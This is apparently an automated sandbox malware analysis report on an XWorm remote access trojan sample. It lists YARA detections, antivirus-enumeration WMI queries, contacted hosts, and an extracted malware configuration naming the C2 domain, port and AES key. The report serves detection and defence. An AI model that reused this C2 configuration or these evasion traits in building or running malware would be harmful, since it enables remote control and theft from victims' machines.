Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.215.224.234	favor.ydns.eu	Germany		10753	LVLT-10753US	false

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
favor.ydns.eu	178.215.224.234	true
s-part-0033.t-0009.t-msedge.net	13.107.246.61	true

AV Detection

Found malware configuration

Source: 00000026.00000002.2599427172.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["favor.ydns.eu"], "Port": 2627, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll

ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Source: pKxhpP0spW.exe

Virustotal: Detection: 9%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: favor.ydns.eu
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 2627
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: PLATA
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: USB.exe

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94601090 BCryptGenRandom,	4_2_00007FFD94601090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946A16C0 BCryptSetProperty,	4_2_00007FFD946A16C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946A1850 BCryptSetProperty,	4_2_00007FFD946A1850
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD92791090 BCryptGenRandom,	21_2_00007FFD92791090
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AAC20 BCryptGenRandom,_CxxThrowException,	21_2_00007FFD9B1AAC20
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5A10 BCryptOpenAlgorithmProvider,BCryptGenRandom,?temp_directory_path@detail@filesystem@boost@@YA?AVpath@23@PEAVerror_code@system@3@@Z,?convert@path_traits@detail@filesystem@boost@@YAXPEBD0AEAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PEBV?$codecvt@_WDU_Mbstatet@@@6@@Z,?append_v3@path@filesystem@boost@@AEAAXPEB_W0@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,BCryptCloseAlgorithmProvider,	21_2_00007FFD9B1A5A10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A1EA0 BCryptOpenAlgorithmProvider,BCryptOpenAlgorithmProvider,__std_exception_copy,	21_2_00007FFD9B1A1EA0

Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_28d48a0b-c

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2

Source: pKxhpP0spW.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	4_2_00007FFD94601090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD9462B550
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rdi	4_2_00007FFD946BB6E0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then xor eax, eax	4_2_00007FFD946017D0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD946A9830
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD9461B090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rbx	4_2_00007FFD9461B180
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push r14	4_2_00007FFD9468F180
